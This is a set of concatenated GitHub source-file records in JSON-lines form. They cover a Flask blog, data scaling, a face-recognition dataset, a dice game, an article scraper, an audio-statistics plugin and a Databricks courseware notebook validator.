admin about\n :return:\n \"\"\"\n return render_template('blog/about.html')\n\n\n@blog_bp.route('/category/')\ndef show_category(category_id):\n \"\"\"\n 显示分类列表\n :param category_id:\n :return:\n \"\"\"\n category = Category.query.get_or_404(category_id)\n page = request.args.get('page', 1, type=int)\n per_page = current_app.config['BLUELOG_POST_PER_PAGE']\n # posts = category.posts 这样只是获取所有列表,而我们需要对这些文章记录附加其他查询过滤器和方法\n # Post.query.with_parent(category)获取了跟category相关的5个Post,且还是query对象可以执行order_by\n pagination = Post.query.with_parent(category).order_by(Post.timestamp.desc()).paginate(page, per_page)\n posts = pagination.items\n return render_template('blog/category.html', category=category, pagination=pagination, posts=posts)\n\n\n@blog_bp.route('/post/', methods=['GET', 'POST'])\ndef show_post(post_id):\n \"\"\"\n 显示文章正文\n :param post_id:\n :return:\n \"\"\"\n # get_or_404 没有找到抛出 abort(404) 错误\n post = Post.query.get_or_404(post_id)\n page = request.args.get('page', 1, type=int)\n # 评论分页\n per_page = current_app.config['BLUELOG_COMMENT_PER_PAGE']\n pagination = Comment.query.with_parent(post).filter_by(reviewed=True).order_by(Comment.timestamp.asc()).paginate(\n page, per_page)\n # 拿到跟页面相关所有reviewed = true 的评论\n comments = pagination.items\n # 如果当前用户已登录,使用管理员表单\n if current_user.is_authenticated:\n form = AdminCommentForm()\n form.author.data = current_user.name\n form.email.data = current_app.config['BLUELOG_EMAIL']\n form.site.data = url_for('.index')\n from_admin = True\n reviewed = True\n else: # 未登录则使用普通表单\n form = CommentForm()\n from_admin = False\n reviewed = False\n # 用户填写Comment表单,POST到后端,填入数据库内\n if form.validate_on_submit():\n author = form.author.data\n email = form.email.data\n site = form.site.data\n body = form.body.data\n # 这里需要注意post赋值的是Post对象,因为post表的字段是relationship\n comment = Comment(\n author=author, email=email, site=site, body=body,\n from_admin=from_admin, post=post, reviewed=reviewed)\n replied_id = request.args.get('reply')\n # 是否是回复,如果是回复,\n if replied_id:\n replied_comment = Comment.query.get_or_404(replied_id)\n comment.replied = replied_comment #双向绑定,comment.replied 就是父亲是 replied_comment , replied_comment.replies是评论的回复\n send_new_reply_email(replied_comment)\n db.session.add(comment)\n db.session.commit()\n if current_user.is_authenticated: # send message based on authentication status\n flash('Comment published.', 'success')\n else:\n flash('Thanks, your comment will be published after reviewed.', 'info')\n send_new_comment_email(post) # send notification email to admin\n # 提及表单,返回到原页面\n return redirect(url_for('.show_post', post_id=post_id))\n return render_template('blog/post.html', post=post, pagination=pagination, form=form, comments=comments)\n\n\n@blog_bp.route('/reply/comment/')\ndef reply_comment(comment_id):\n \"\"\"\n reply comment\n :param comment_id: 触发评论的id\n :return:\n \"\"\"\n # 点击replay 回到这个接口构造 .show_post\n comment = Comment.query.get_or_404(comment_id)\n if not comment.post.can_comment:\n flash('Comment is disabled.', 'warning')\n # 跳回该文章\n return redirect(url_for('.show_post', post_id=comment.post.id))\n # 构造replay和author跳回到.show_post该路径下comment-form下,让用户填写评论\n return redirect(\n url_for('.show_post', post_id=comment.post_id, reply=comment_id, author=comment.author) + '#comment-form')\n\n\n@blog_bp.route('/change-theme/')\ndef change_theme(theme_name):\n if theme_name not in current_app.config['BLUELOG_THEMES'].keys():\n abort(404)\n\n response = make_response(redirect_back())\n response.set_cookie('theme', theme_name, max_age=30 * 24 * 60 * 60)\n return response\n","repo_name":"yubowen0525/Personal_Blog","sub_path":"project/blueprints/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11971381728","text":"#PREPARE FUNCTION USED TO SCALE WRANGLED ZILLOW DATA TO PREPARE FOR MODELING\n# using min max scaling method\n\n#a. imports\n\n#b. scale\n# list columns to scale\n# create scaling object\n# fit scaling object to train data\n# transform datasets\n# transform train\n# transform validate\n# transform test\n\n#a.IMPORTS\n#******************************************************************************\nimport wrangle\n\nimport sklearn.preprocessing\n\n\n#b. SCALE\n#******************************************************************************\ndef scale_zillow(test, validate, train):\n \n #listing columns to scale, all excepts fips\n cols_to_scale = train.drop(columns = ['bedrooms', 'bathrooms', 'year_built', 'fips']).columns.to_list()\n \n #create scaler object\n scaler = sklearn.preprocessing.MinMaxScaler()\n \n #fit scaler object to train\n scaler = scaler.fit(train[cols_to_scale])\n \n #transform data\n scaled_train = scaler.transform(train[cols_to_scale])\n scaled_validate = scaler.transform(validate[cols_to_scale])\n scaled_test = scaler.transform(test[cols_to_scale])\n \n return scaled_train, scaled_validate, scaled_test\n ","repo_name":"stephanie-jones78/regression_exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16222388810","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom facenet_pytorch import MTCNN\n\nimport PIL\n\nfrom collections import defaultdict\nimport random\nimport glob\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmtcnn = MTCNN(\n image_size=160, margin=0, min_face_size=20,\n thresholds=[0.6, 0.7, 0.7], factor=0.709, post_process=True,\n device=device\n)\n\n\nclass Base(DataSet):\n def __init__(self, data_path, data_size, transforms=None):\n super(Base, self).__init__()\n self.data_path = data_path\n self.data_size = data_size\n self.transforms = transforms\n self.data_dict = self.read_files()\n \n def read_files(self):\n work_dir = os.getcwd()\n os.chdir(self.data_path)\n data_dict = defaultdict(dict)\n\n try:\n for file in glob.glob('./*'):\n path_split = file.split('/')[1:]\n data_dict[path_split[0]] = glob.glob(path_split[0]+'/*')\n except Exception as e:\n print(e)\n os.chdir(work_dir)\n os.chdir(work_dir)\n return data_dict\n \n def __len__(self):\n return self.data_size\n\nclass TestData(Base):\n def __init__(self, data_path, data_size, n_ways, transforms=None):\n super(Base, self).__init__(data_path, data_size, transforms)\n self.nways = n_ways\n \n def __getitem__(self, index):\n cats = random.sample(self.data_dict.keys(), self.n_ways)\n \n main_img = pos_img = None\n while None in [main_img, pos_img]:\n main_img, pos_img = [mtcnn(PIL.Image.open(self.data_path + '/' + img)) for img in \\\n random.sample(self.data_dict[cats[0]], 2)]\n \n test_set = []\n while (len(test_set)!=(self.n_ways-1)):\n cat = random.choice(cats[1:])\n img = mtcnn(PIL.Image.open(self.data_path + '/' + random.choice(self.data_dict[cat])))\n if img is None:\n continue\n test_set.append(img)\n test_set.append(pos_img)\n \n test_set = torch.stack(test_set)\n return (main_img, test_set)","repo_name":"shreyasrbhat/FaceRecognition","sub_path":"app/face_recog/models/networks/face_recognition/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70975456905","text":"import random\nfrom library_functions import get_library\nfrom dice_list import DiceList, create_ddm_dice\n\nclass DicePool(DiceList):\n \"\"\"\n Set of 15 dice used by a player to play the game.\n \"\"\"\n def __init__(self, log):\n super().__init__(\"dice pool\", log, 15)\n\n def fill_random(self, library):\n \"\"\"\n Fill the dice pool with random dice from a dice \n library.\n \"\"\"\n library_items = list(library.items())\n # add random dices until the dice pull is full\n while not self.is_full():\n # random index\n dice_id, params = random.choice(library_items)\n dice = create_ddm_dice(params)\n self.add(dice)\n\n def fill_from_ids(self, id_list, library):\n \"\"\"\n Fill dice pool from id an id list. The dice is \n extracted from the dice library with the same ids.\n \"\"\"\n keys = library.keys()\n for id in id_list:\n if id in keys:\n params = library[id]\n else:\n self.log.add(\"Invalid dice ID \" + str(id) +\n \", skipping.\\n\")\n continue\n dice = create_ddm_dice(params)\n self.add(dice)\n\n","repo_name":"francocurotto/YDDM-re-old","sub_path":"source/game_logic/ddm_list/dice_pool.py","file_name":"dice_pool.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18942188625","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\n\n_url = 'http://cyberleninka.ru/article'\n\n\nclass Article:\n\n\tdef __init__(self,url):\n\t\tsoup = BeautifulSoup(get_html(url))\n\n\t\tfor point in soup.find_all('p', itemprop='description'): self.summary = point.get_text()\n\t\tfor point in soup.find_all('p', itemprop='articleBody'): self.body = point.get_text()\n\t\tfor point in soup.find_all('span', itemprop='headline'): self.head = point.get_text()\n\n\tdef serialize(self):\n\t\treturn {'head': self.head, 'body': self.body, 'summary': self.summary}\n\n\ndef get_html(url):\n\tresponse = urllib.request.urlopen(url)\n\treturn response.read()\n\n\ndef get_number_of_last_page(url):\n\tsoup = BeautifulSoup(get_html(url))\n\tfor link in soup.find_all('a',class_='last link-page'): return int(link.get('page'))\n\n\ndef parse_category(url):\n\tcategory_list = list()\n\tsoup = BeautifulSoup(get_html(url))\n\tcatalog = soup.find('div', class_='catalog-article')\n\tfor group in catalog.find_all('li')[2:]:\n\t\tif group.a is not None:\n\t\t\tcategory_list.append((group.a.get_text(),'http://cyberleninka.ru' + group.a.get('href')))\t\n\treturn category_list\n\n\ndef get_articles_urls(url):\n\tarticles_urls = list()\n\tfor i in range(1,get_number_of_last_page(url)+1):\n\t\tsoup = BeautifulSoup(get_html(url+'/'+str(i)))\n\t\tfor article in soup.find_all('span', class_='heading-text'):\n\t\t\tif article.a is not None:\n\t\t\t\tart_links = 'http://cyberleninka.ru' + article.a.get('href')\n\t\t\tarticles_urls.append(art_links)\n\t\tprint(url+'/'+str(i))\n\treturn articles_urls\n","repo_name":"peter-the-void/analysis-scientific-articles","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42169095761","text":"from __future__ import print_function\nimport sys, os, operator\nfrom collections import Counter\n\nfrom eyed3 import id3\nfrom eyed3.core import AUDIO_MP3\nfrom eyed3.utils import guessMimetype, cli\nfrom eyed3.plugins import LoaderPlugin\n\nID3_VERSIONS = [id3.ID3_V1_0, id3.ID3_V1_1,\n id3.ID3_V2_2, id3.ID3_V2_3, id3.ID3_V2_4]\n\n_OP_STRINGS = {operator.le: \"<=\",\n operator.lt: \"< \",\n operator.ge: \">=\",\n operator.gt: \"> \",\n operator.eq: \"= \",\n operator.ne: \"!=\",\n }\n\nclass Stat(Counter):\n TOTAL = \"total\"\n\n def __init__(self, *args, **kwargs):\n super(Stat, self).__init__(*args, **kwargs)\n self[self.TOTAL] = 0\n self._key_names = {}\n\n def compute(self, file, audio_file):\n self[self.TOTAL] += 1\n self._compute(file, audio_file)\n\n def _compute(self, file, audio_file):\n pass\n\n def report(self):\n self._report()\n\n def _sortedKeys(self, most_common=False):\n def keyDisplayName(k):\n return self._key_names[k] if k in self._key_names else k\n\n key_map = {}\n for k in self.keys():\n key_map[keyDisplayName(k)] = k\n\n if not most_common:\n sorted_names = list(key_map.keys())\n sorted_names.remove(self.TOTAL)\n sorted_names.sort()\n sorted_names.append(self.TOTAL)\n else:\n most_common = self.most_common()\n sorted_names = []\n remainder_names = []\n for k, v in most_common:\n if k != self.TOTAL and v > 0:\n sorted_names.append(keyDisplayName(k))\n elif k != self.TOTAL:\n remainder_names.append(keyDisplayName(k))\n\n remainder_names.sort()\n sorted_names = sorted_names + remainder_names\n sorted_names.append(self.TOTAL)\n\n return [key_map[name] for name in sorted_names]\n\n def _report(self, most_common=False):\n keys = self._sortedKeys(most_common=most_common)\n\n key_col_width = 0\n val_col_width = 0\n for key in keys:\n key = self._key_names[key] if key in self._key_names else key\n key_col_width = max(key_col_width, len(str(key)))\n val_col_width = max(val_col_width, len(str(self[key])))\n key_col_width += 1\n val_col_width += 1\n\n for k in keys:\n key_name = self._key_names[k] if k in self._key_names else k\n value = self[k]\n percent = self.percent(k) if value and k != \"total\" else \"\"\n print(\"%(padding)s%(key)s:%(value)s%(percent)s\" % \n { \"padding\": ' ' * 4,\n \"key\": str(key_name).ljust(key_col_width),\n \"value\": str(value).rjust(val_col_width),\n \"percent\": \" ( %s%.2f%%%s )\" % \n (cli.GREEN, percent, cli.RESET) if percent\n else \"\",\n })\n\n def percent(self, key):\n return (float(self[key]) / float(self[\"total\"])) * 100\n\n\nclass AudioStat(Stat):\n def compute(self, audio_file):\n assert(audio_file)\n self[\"total\"] += 1\n self._compute(audio_file)\n\n def _compute(self, audio_file):\n pass\n\n\nclass FileCounterStat(Stat):\n def __init__(self):\n super(FileCounterStat, self).__init__()\n for k in (\"audio\", \"hidden\", \"audio (other)\"):\n self[k] = 0\n\n def _compute(self, file, audio_file):\n if audio_file:\n self[\"audio\"] += 1\n if os.path.basename(file).startswith('.'):\n self[\"hidden\"] += 1\n mt = guessMimetype(file)\n if mt and mt.startswith(\"audio/\") and not audio_file:\n self[\"unsupported (other)\"] += 1\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"Files:\" + cli.RESET)\n super(FileCounterStat, self)._report()\n\n\nclass MimeTypeStat(Stat):\n def _compute(self, file, audio_file):\n mt = guessMimetype(file)\n self[mt] += 1\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"Mime-Types:\" + cli.RESET)\n super(MimeTypeStat, self)._report(most_common=True)\n\n\nclass Id3VersionCounter(AudioStat):\n def __init__(self):\n super(Id3VersionCounter, self).__init__()\n for v in ID3_VERSIONS:\n self[v] = 0\n self._key_names[v] = id3.versionToString(v)\n\n def _compute(self, audio_file):\n if audio_file.tag:\n self[audio_file.tag.version] += 1\n else:\n self[None] += 1\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"ID3 versions:\" + cli.RESET)\n super(Id3VersionCounter, self)._report()\n\n\nclass BitrateCounter(AudioStat):\n def __init__(self):\n super(BitrateCounter, self).__init__()\n self[\"cbr\"] = 0\n self[\"vbr\"] = 0\n self.bitrate_keys = [(operator.le, 96),\n (operator.le, 112),\n (operator.le, 128),\n (operator.le, 160),\n (operator.le, 192),\n (operator.le, 256),\n (operator.le, 320),\n (operator.gt, 320),\n ]\n for k in self.bitrate_keys:\n self[k] = 0\n op, bitrate = k\n self._key_names[k] = \"%s %d\" % (_OP_STRINGS[op], bitrate)\n\n def _compute(self, audio_file):\n if audio_file.type != AUDIO_MP3 or audio_file.info is None:\n self[\"total\"] -= 1\n return\n\n vbr, br = audio_file.info.bit_rate\n if vbr:\n self[\"vbr\"] += 1\n else:\n self[\"cbr\"] += 1\n\n for key in self.bitrate_keys:\n key_op, key_br = key\n if key_op(br, key_br):\n self[key] += 1\n break\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"MP3 bitrates:\" + cli.RESET)\n super(BitrateCounter, self)._report(most_common=True)\n\n def _sortedKeys(self, most_common=False):\n keys = super(BitrateCounter, self)._sortedKeys(most_common=most_common)\n keys.remove(\"cbr\")\n keys.remove(\"vbr\")\n keys.insert(0, \"cbr\")\n keys.insert(1, \"vbr\")\n return keys\n\n\nclass StatisticsPlugin(LoaderPlugin):\n NAMES = ['stats']\n SUMMARY = u\"Computes statistics for all audio files scanned.\"\n\n def __init__(self, arg_parser):\n super(StatisticsPlugin, self).__init__(arg_parser)\n self._stats = []\n\n self.file_counter = FileCounterStat()\n self._stats.append(self.file_counter)\n\n self.mt_stat = MimeTypeStat()\n self._stats.append(self.mt_stat)\n\n self.id3_version_counter = Id3VersionCounter()\n self._stats.append(self.id3_version_counter)\n\n self.bitrates = BitrateCounter()\n self._stats.append(self.bitrates)\n\n def handleFile(self, f):\n super(StatisticsPlugin, self).handleFile(f)\n sys.stdout.write('.')\n sys.stdout.flush()\n\n for stat in self._stats:\n if isinstance(stat, AudioStat):\n if self.audio_file:\n stat.compute(self.audio_file)\n else:\n stat.compute(f, self.audio_file)\n\n def handleDone(self):\n print(\"\\n\")\n for stat in self._stats:\n stat.report()\n print(\"\\n\")\n print()\n","repo_name":"uforia/Uforia","sub_path":"source/libraries/eyed3/plugins/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"73839310664","text":"from typing import Callable, Union, List\nfrom dbacademy_courseware.dbbuild import common\n\nD_TODO = \"TODO\"\nD_ANSWER = \"ANSWER\"\nD_SOURCE_ONLY = \"SOURCE_ONLY\"\nD_DUMMY = \"DUMMY\"\n\nD_INCLUDE_HEADER_TRUE = \"INCLUDE_HEADER_TRUE\"\nD_INCLUDE_HEADER_FALSE = \"INCLUDE_HEADER_FALSE\"\nD_INCLUDE_FOOTER_TRUE = \"INCLUDE_FOOTER_TRUE\"\nD_INCLUDE_FOOTER_FALSE = \"INCLUDE_FOOTER_FALSE\"\n\nSUPPORTED_DIRECTIVES = [D_SOURCE_ONLY, D_ANSWER, D_TODO, D_DUMMY,\n D_INCLUDE_HEADER_TRUE, D_INCLUDE_HEADER_FALSE, D_INCLUDE_FOOTER_TRUE, D_INCLUDE_FOOTER_FALSE, ]\n\n\nclass NotebookError:\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return self.message\n\n def __repr__(self):\n return self.message\n\n\nclass NotebookDef:\n from dbacademy_courseware.dbbuild import BuildConfig\n\n def __init__(self,\n *,\n build_config: BuildConfig,\n path: str,\n replacements: dict,\n include_solution: bool,\n test_round: int,\n ignored: bool,\n order: int,\n i18n: bool,\n i18n_language: Union[None, str],\n ignoring: list,\n version: str):\n from dbacademy_courseware.dbbuild import BuildConfig\n\n assert type(build_config) == BuildConfig, f\"\"\"Expected the parameter \"build_config\" to be of type \"BuildConfig\", found \"{type(build_config)}\" \"\"\"\n assert type(path) == str, f\"\"\"Expected the parameter \"path\" to be of type \"str\", found \"{type(path)}\" \"\"\"\n assert type(replacements) == dict, f\"\"\"Expected the parameter \"replacements\" to be of type \"dict\", found \"{type(replacements)}\" \"\"\"\n assert type(include_solution) == bool, f\"\"\"Expected the parameter \"include_solution\" to be of type \"bool\", found \"{type(include_solution)}\" \"\"\"\n\n self.build_config = build_config\n self.client = build_config.client\n self.path = path\n self.replacements = replacements or dict()\n\n self.include_solution = include_solution\n self.errors: List[NotebookError] = list()\n self.warnings: List[NotebookError] = list()\n\n self.test_round = test_round\n self.ignored = ignored\n self.order = order\n\n self.i18n = i18n\n self.i18n_language = i18n_language\n self.i18n_guids = list()\n\n self.ignoring = ignoring\n self.version = version\n\n def __str__(self):\n result = self.path\n result += f\"\\n - include_solution = {self.include_solution}\"\n result += f\"\\n - replacements = {self.replacements}\"\n return result or \"\"\n\n def test(self, assertion: Callable[[], bool], message: str) -> bool:\n if assertion is None or not assertion():\n self.errors.append(NotebookError(message))\n return False\n else:\n return True\n\n def warn(self, assertion: Callable[[], bool], message: str) -> bool:\n if assertion is None or not assertion():\n self.warnings.append(NotebookError(message))\n return False\n else:\n return True\n\n def assert_no_warnings(self) -> None:\n if len(self.warnings) > 0:\n what = \"warning was\" if len(self.warnings) == 1 else \"warnings were\"\n print(f\"CAUTION: {len(self.warnings)} {what} found while publishing\")\n for warning in self.warnings:\n print(\"-\" * 80)\n print(warning.message)\n print()\n\n def assert_no_errors(self, print_warnings) -> None:\n if len(self.errors) > 0:\n what = \"error was\" if len(self.errors) == 1 else \"errors were\"\n print(f\"ABORTING: {len(self.errors)} {what} found while publishing\")\n for error in self.errors:\n print(\"-\" * 80)\n print(error.message)\n raise Exception(\"Publish aborted - see previous errors for more information\")\n\n if print_warnings:\n self.assert_no_warnings()\n\n def test_notebook_exists(self, i, what, original_target, target, other_notebooks):\n if not target.startswith(\"../\") and not target.startswith(\"./\"):\n self.warn(lambda: False, f\"Cmd #{i+1} | Found unexpected, relative, {what} target: \\\"{original_target}\\\" resolved as \\\"{target}\\\"\".strip())\n return\n\n all_paths = set()\n for other in other_notebooks:\n # Add the original notebook's path\n all_paths.add(other.path)\n\n # Get the notebook's directory\n directory = '/'.join(other.path.split(\"/\")[:-1])\n all_paths.add(directory)\n\n # While there are still parent directories, keep processing\n while directory.count(\"/\") > 0:\n directory = '/'.join(directory.split(\"/\")[:-1])\n all_paths.add(directory)\n\n offset = -1\n\n if target.startswith(\"../\"):\n while target.startswith(\"../\"):\n offset -= 1\n target = target[3:] \n\n elif target.startswith(\"./\"):\n target = target[2:]\n\n if \"/\" in self.path:\n parent = '/'.join(self.path.split(\"/\")[:offset])\n target = f\"{parent}/{target}\"\n\n if target.startswith(\"/\"): target = target[1:]\n\n notebooks = [n for n in all_paths if target == n]\n\n message = f\"Cmd #{i+1} | Cannot find notebook for the {what} target: \\\"{original_target}\\\" resolved as \\\"{target}\\\"\"\n # self.test(lambda: len(notebooks) != 0, message)\n self.test(lambda: len(notebooks) != 0, message)\n\n @staticmethod\n def get_latest_commit_id(repo_name):\n import requests\n repo_url = f\"https://api.github.com/repos/databricks-academy/{repo_name}/commits/published\"\n response = requests.get(repo_url)\n assert response.status_code == 200, f\"Expected 200, received {response.status_code}\"\n\n return response.json().get(\"sha\")\n\n @staticmethod\n def parse_version(command, url):\n import sys\n pos_a = command.find(url)\n assert pos_a >= 0, f\"Unable to find \\\"{url}\\\" in command string:\\n{command}\"\n pos_a += len(url)\n\n pos_x = command.find(\" \", pos_a)\n if pos_x < 0: pos_x = sys.maxsize\n\n pos_y = command.find(\"\\n\", pos_a)\n if pos_y < 0: pos_y = sys.maxsize\n\n end = len(command)+1\n\n pos_b = min(min(pos_x, pos_y), end)\n\n version = command[pos_a:pos_b]\n return version\n\n def update_git_commit(self, command: str, url: str) -> str:\n from dbacademy_courseware.dbbuild import BuildConfig\n if url not in command: return command\n else:\n if f\"{url}@v\" in command:\n version = self.parse_version(command, f\"{url}@v\")\n print(f\"Publishing w/version v{version} for {url}\")\n return command # This is a specific version and should be OK as-is\n\n elif f\"{url}@\" in command:\n # This is a pinned comment and generally not allowed.\n version = self.parse_version(command, f\"{url}@\")\n if self.version in BuildConfig.VERSIONS_LIST:\n print(f\"Publishing w/version @{version} for {url}\")\n self.warn(lambda: False, f\"Building with named branch or commit id ({version}), not a released version, not head - this will prevent publishing.\")\n return command # Don't update, run with it as-is\n else:\n # Fail the build here because we cannot publish this way.\n print(f\"Failing publish of version @{version} for {url}\")\n self.test(lambda: False, f\"Cannot publish with libraries that specify a specific branch or commit id ({version}).\")\n return command # Return the value, will abort later\n else:\n # We are building from the head, so we need to lock in the version number.\n name = url.split(\"/\")[-1]\n commit_id = NotebookDef.get_latest_commit_id(name)\n new_url = f\"{url}@{commit_id}\"\n print(f\"Publishing w/commit \\\"{commit_id}\\\" for {url}\")\n return command.replace(url, new_url)\n\n def test_pip_cells(self, language: str, command: str, i: int) -> str:\n \"\"\"\n Validates %pip cells, mostly to ensure that dbacademy-* resources are fixed to a specific version\n :param language: The language of the corresponding notebook\n :param command: The %run command string to be evaluated\n :param i: The zero-based index to the command within the notebook\n :return: None\n \"\"\"\n import re\n\n # First verify that the specified command is a %pip cell\n cm = self.get_comment_marker(language)\n prefix = f\"{cm} MAGIC %pip\"\n if not command.startswith(prefix):\n return command\n\n command = self.update_git_commit(command, \"git+https://github.com/databricks-academy/dbacademy-gems\")\n command = self.update_git_commit(command, \"git+https://github.com/databricks-academy/dbacademy-rest\")\n command = self.update_git_commit(command, \"git+https://github.com/databricks-academy/dbacademy-helper\")\n\n if \"https://github.com/databricks-academy/dbacademy-helper\" in command:\n assert \"https://github.com/databricks-academy/dbacademy-rest\" in command, f\"Cmd #{i + 1} | Using repo dbacademy-helper without including dbacademy-rest\"\n assert \"https://github.com/databricks-academy/dbacademy-gems\" in command, f\"Cmd #{i + 1} | Using repo dbacademy-helper without including dbacademy-gems\"\n elif \"https://github.com/databricks-academy/dbacademy-rest\" in command:\n assert \"https://github.com/databricks-academy/dbacademy-gems\" in command, f\"Cmd #{i + 1} | Using repo dbacademy-rest without including dbacademy-gems\"\n\n # Assuming that %pip is a one-liner or at least should be\n pattern = re.compile(r\"^# MAGIC \", re.MULTILINE)\n libraries = [r for r in pattern.sub(\"\", command).replace(\"\\n\", \" \").split(\" \") if r.startswith(\"git+https://github.com/databricks-academy\")]\n for library in libraries:\n # Not all libraries should be pinned, such as the build tools themselves.\n if library != \"git+https://github.com/databricks-academy/dbacademy-courseware\":\n self.test(lambda: \"@\" in library, f\"Cmd #{i + 1} | The library is not pinned to a specific version: {library}\\n{command}\")\n\n return command\n\n def test_run_cells(self, language: str, command: str, i: int, other_notebooks: list) -> None:\n \"\"\"\n Validates %run cells meet specific requirements\n :param language: The language of the corresponding notebook\n :param command: The %run command string to be evaluated\n :param i: The zero-based index to the command within the notebook\n :param other_notebooks: A complete list of notebooks for cross-validation\n :return: None\n \"\"\"\n\n # First verify that the specified command is a %run cell\n cm = self.get_comment_marker(language)\n prefix = f\"{cm} MAGIC %run\"\n if not command.startswith(prefix):\n return\n\n line_zero = command.split(\"\\n\")[0]\n link = line_zero[len(prefix):].strip()\n\n if link.startswith(\"\\\"\"):\n link = link[1:]\n pos = link.find(\"\\\"\")\n if pos < 0:\n self.warn(lambda: False, f\"Cmd #{i+1} | Missing closing quote in %run target\")\n return\n else:\n link = link[:pos]\n else:\n pos = link.find(\" \")\n if pos > 0:\n link = link[:pos]\n\n self.test_notebook_exists(i, \"%run\", link, link, other_notebooks)\n\n # def validate_single_tick(self, i, command):\n # \"\"\"Test for usage of single-ticks that should also be bolded\"\"\"\n #\n # import re\n #\n # for result in re.findall(r\"[^\\*]`[^\\s]*`[^\\*]\", command):\n # if \"single-tick\" not in self.ignoring:\n # self.warn(lambda: False, f\"Cmd #{i+1} | Found a single-tick block, expected the **`xx`** pattern: \\\"{result}\\\"\")\n\n def validate_md_link(self, i, command, other_notebooks):\n \"\"\"Test for MD links to be replaced with html links\"\"\"\n\n import re\n\n # TODO Fix this error after a proper unit tests is created.\n # noinspection RegExpRedundantEscape\n for link in re.findall(r\"(?\", command)\n\n def validate_html_link(self, i, command):\n \"\"\"Test all HTML links to ensure they have a target set to _blank\"\"\"\n\n for link in self.parse_html_links(command):\n if \"target=\\\"_blank\\\"\" not in link:\n self.warn(lambda: False, f\"Cmd #{i+1} | Found HTML link without the required target=\\\"_blank\\\": {link}\")\n\n # Need to validate that the link exists.\n\n def test_source_for(self, command: str, i: int, what: str):\n if what in command:\n pos = command.find(what)\n pos_a = command.rfind(\"\\n\", 0, pos)\n pos_a = 0 if pos_a == -1 else pos_a\n\n pos_b = command.find(\"\\n\", pos)\n pos_b = len(command)-1 if pos_b == -1 else pos_b\n\n line = command[pos_a:pos_b].strip()\n\n prefix = f\"Cmd #{i+1} \"\n padding = \" \"*len(prefix)\n if \"prohibited-dataset\" not in self.ignoring:\n self.warn(lambda: False, f\"{prefix}| Course includes prohibited use of {what}:\\n{padding}| {line}\")\n\n def test_source_cells(self, language: str, command: str, i: int):\n\n if language not in [\"python\", \"scala\", \"sql\", \"java\", \"r\"]:\n return command\n\n self.test_source_for(command, i, \"/mnt/training\")\n self.test_source_for(command, i, \"/databricks-datasets\")\n\n return command\n\n def replace_guid(self, cm: str, command: str, i: int, i18n_guid_map: dict):\n lines = command.strip().split(\"\\n\")\n line_0 = lines[0][7+len(cm):]\n\n parts = line_0.strip().split(\" \")\n for index, part in enumerate(parts):\n if part.strip() == \"\":\n del parts[index]\n\n md_tag = None if len(parts) < 1 else parts[0]\n guid = None if len(parts) < 2 else parts[1].strip()\n\n debug_info = line_0\n\n passed = self.test(lambda: len(lines) > 1, f\"Cmd #{i + 1} | Expected MD to have more than 1 line of code with i18n enabled: {debug_info}\")\n\n if len(parts) == 1:\n passed = passed and self.test(lambda: False, f\"Cmd #{i + 1} | Missing the i18n directive: {debug_info}\")\n else:\n passed = passed and self.test(lambda: len(parts) == 2, f\"Cmd #{i + 1} | Expected the first line of MD to have only two words, found {len(parts)}: {debug_info}\")\n passed = passed and self.test(lambda: parts[0] in [\"%md\", \"%md-sandbox\"], f\"Cmd #{i + 1} | Expected word[0] of the first line of MD to be \\\"%md\\\" or \\\"%md-sandbox\\\", found {parts[0]}: {debug_info}\")\n passed = passed and self.test(lambda: guid.startswith(\"--i18n-\"), f\"Cmd #{i + 1} | Expected word[1] of the first line of MD to start with \\\"--i18n-\\\", found {guid}: {debug_info}\")\n\n if passed:\n passed = passed and self.test(lambda: guid not in self.i18n_guids, f\"Cmd #{i + 1} | Duplicate i18n GUID found: {guid}\")\n\n if passed:\n self.i18n_guids.append(guid)\n\n if not self.i18n_language:\n # This is a \"standard\" publish, just remove the i18n directive\n del lines[0] # Remove the i18n directive\n else:\n # We must confirm that the replacement GUID actually exists\n if self.warn(lambda: guid in i18n_guid_map, f\"The GUID \\\"{guid}\\\" was not found for the translation of {self.i18n_language}\"):\n lines = i18n_guid_map.get(guid).split(\"\\n\")\n\n if self.build_config.i18n_xml_tag_disabled:\n lines.insert(0, f\"{cm} MAGIC {md_tag}\")\n else:\n lines.insert(0, f\"{cm} MAGIC {md_tag} \")\n\n command = \"\\n\".join(lines)\n\n return command\n\n def update_md_cells(self, language: str, command: str, i: int, i18n_guid_map: dict, other_notebooks: list):\n\n # First verify that the specified command is a mark-down cell\n cm = self.get_comment_marker(language)\n if not command.startswith(f\"{cm} MAGIC %md\"):\n return command\n \n # No longer enforcing this requirement\n # self.validate_single_tick(i, command)\n\n self.validate_md_link(i, command, other_notebooks)\n self.validate_html_link(i, command)\n\n if not self.i18n:\n return command\n else:\n return self.replace_guid(cm=cm,\n command=command,\n i=i,\n i18n_guid_map=i18n_guid_map)\n\n def create_resource_bundle(self, natural_language: str, source_dir: str, target_dir: str) -> None:\n natural_language = None if natural_language is None else natural_language.lower()\n\n assert type(natural_language) == str, f\"\"\"Expected the parameter \"natural_language\" to be of type \"str\", found \"{type(natural_language)}\" \"\"\"\n assert type(source_dir) == str, f\"\"\"Expected the parameter \"source_dir\" to be of type 